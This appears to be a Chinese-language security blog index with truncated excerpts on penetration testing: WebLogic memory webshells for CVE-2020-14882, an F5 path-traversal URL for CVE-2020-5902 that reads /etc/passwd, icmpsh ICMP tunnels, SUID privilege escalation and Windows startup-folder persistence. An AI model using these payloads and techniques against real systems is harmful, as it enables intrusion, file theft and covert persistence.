_

cve-2020-14882

weblogic内存马

搭建weblogic环境,直接下载CVE-2020-14882漏洞版本的安装包直接默认下一步 可以在网上找到比较好用的weblogic内存马进行修改 这里以https://github.com/...

cve-2020-5902

文件读取 https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://...

icmp隐藏隧道

icmpsh 安装依赖:apt-get install python-impacket关闭本地icmp应答:sysctl -w net.ipv4.icmp_echo_ignore_all=1被控...

linux内网收集

内核,操作系统,设备信息123456789101112uname -a 打印所有可用的系统信息uname -r 内核版本uname -n 系统主机名。uname -m 查...

linux提权

SUID 提权查看可以suid 提权的可执行文件 1find / -perm -u=s -type f 2>/dev/null find执行命令 ...

windows权限维持

启动项权限维持(需要本地管理员权限)用户启动项权限维持1move c:\xxx.exe "C:\Users\{username}\AppData\Roaming\M...

windows信息收集

本机信息收集用户信息123查看本地用户:net user查看本地管理员组(通常包含域用户):net localgroup administrators查看指定用户详细信息:net user xx...